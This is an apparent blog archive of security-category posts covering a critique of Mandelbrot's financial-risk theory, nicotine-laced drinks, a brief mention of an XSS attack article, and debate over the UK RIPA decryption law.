Category Archives: Security

Mandelbrot on financial risk

A book review on Amazon provides a prickly rebuke to Mandelbrot and Hudson’s new theories on finanical risk:

Because the two main assumptions of modern finance are flawed, all related models are flawed as they understate risk. If such models understate risk, they actually overprice stocks and underprice options, and also understate the capital financial institutions should hold to withstand market risk.

If the author had stopped there, I would have given him a 5 rating. However, such a rebuttal of finance theory would make no more than a great essay. Instead, he attempts to build an entirely different edifice of modern finance over 300 pages. And, his theoretical foundation lacks any robustness. That’s why I call it a castle of cards.

Mandelbrot builds his edifice of modern finance on two new parameters that would replace the mean return and volatility of return or standard deviation (mean and standard deviation being the parameters defining a normal distribution). His first parameter is Alpha, derived from Pareto’s Law, is an exponent that measures how wildly prices vary. It defines how fat the tails of the price change curve are. The second one, the H Coefficient, borrowed from a hydrologist named Hurst, is an exponent that measures the dependence of price changes upon past changes.

Well, what is wrong with these two measures? He confesses at the end of the book that no two individuals calculate the same Alpha and H Coefficient when using the exact same historical data! Apparently, there is no one established way to calculate these two parameters. The divergence between the various methodologies can be huge. Using one method, you could derive Alpha and H coefficients that suggest a stock is not risky, using another method you would reach the opposite conclusion. So, after reading nearly 300 pages of intense theories you get that their own foundations are at this stage nonexistent. If Alpha and H are mathematically not replicable and well defined, you can’t apply his multifractal geometry model in any meaningful way.

I haven’t read the book yet, so I’ll wait before commenting, but I thought the reviewer provided some excellent points on the inherent flaws in risk calculations, worth noting here.

Nicotine drinks

I overheard someone talking about the latest “energy” drinks in Japan and their nicotine content. This sounded odd to me, so I did a little research and found that there are in fact companies putting nicotine into drinks. Here, for example, is nicotine laced fruit juice:

The delivery system should prove popular, with growth in the functional beverage market, and more accessible than over-the-counter smoking-cessation products. But nicotine-based drinks are faced with significant safety issues, as well as taste concerns.

Finished products wil need to mask the ‘pepper’ taste of nicotine yet contain enough of the ingredient to be effective.

Drinks are already considered habit-forming, so you have to wonder about the “safer than a cigarette” marketing program. Will this be an over-the-counter refreshment? I would hate to buy one on accident, which is exactly the subject of the conversation that grabbed my interest — someone did not realize that the drink they bought had nicotine and could not believe it would even be legal.

XSS Cookbook

Busy day. I already have a half dozen things to post, but in the interest of time and brevity I just wanted to mention a guide to cross site scripting attacks. This kind of article, subtitled “Three Ingredients for a Successful Hack”, reminds me of the controversy over the Anarchist Cookbook but updated for the digital age:

Cross site scripting (XSS) errors are generally considered nothing more than a nuisance — most people do not realize the inherent danger these types of bugs create. In this article Seth Fogie looks at a real life XSS attack and how it was used to bypass the authentication scheme of an online web application, leading to “shell” access to the web server.

Great. Now back to helping people find and quickly remove XSS vulnerabilities…

Encryption and the road to hell

This morning’s BBC report has brought to light the ongoing debate over how to enforce the UK Regulation of Investigatory Powers (RIP) Act from 2000.

Part III of RIPA gives law enforcement agencies the decryption powers and, provided some conditions are met, makes it a serious offence to refuse to turn scrambled files into an “intelligible” form. Those refusing could see their sentence increased as a result.

The government is holding a consultation exercise on the code of conduct that those using these powers will have to abide by.

The code was debated at a public meeting organised by digital rights group the Foundation for Information Policy Research (FIPR).

This debate seems to start from the age old issue of whether people are required to incriminate themselves when police are unable to find evidence against them. This situation, however, is slightly more complicated because encryption keys are so easily hidden and/or destroyed. Moreover, encryption is so frustratingly easy for law enforcement to find precisely because it can be so difficult for them to decipher. In theory you can leave encrypted files lying about without fear of them being used as evidence against you, unlike a smoking gun or a bloody knife, so to speak.

So, just at the time when encryption is starting to really be adopted on the personal computer the police are demanding that they need either special privileges such as a back-door or the right to inflict severe penalties on anyone refusing to decrypt data on demand. It is interesting to read that the US government seems to be moving ahead (“VA to spend $3.7M on encryption tools”) since the adopters must be curiously watching the UK to see what kind of liabilities they could bring to themselves. They spend money trying to avoid liability, and could just end up with a different set (e.g. will internal investigators be able to access VA data without alerting suspects or demanding decryption?).

Mr Bowden [former head of FIPR] also questioned the wisdom of making it an offence to refuse to unscramble evidence. He said there were many scenarios that made it possible for a suspect to deny they ever had the key that unlocked encrypted data.

Already, he said, there had been one court case in which a suspect was acquitted after claiming a computer virus under someone else’s control had caused the offences for which he faced trial. Mr Bowden speculated that other suspects could use the same tactic or would fake a virus infection to get themselves off the hook.

There is certainly no silver bullet here so it is good to see the debate taking place. Unfortunately finding common ground is complicated by a lack of experience and examples to help everyone find an appropriate balance.

Key management systems and encryption that I have deployed have always encountered resistance primarily from those who are the least familiar with what it can and will do for them. I usually tell people that encryption, like other tools, is a double-edged sword that needs careful guidance and legislation/policy to help ensure proper use and to prevent misuse. Many people feel strongly about these issues and so it is important to review the possibilities early to avoid unpleasant surprises. Or as Lord Philips of Sudbury put it:

“You do not secure the liberty of our country and value of our democracy by undermining them,” he said. “That’s the road to hell.”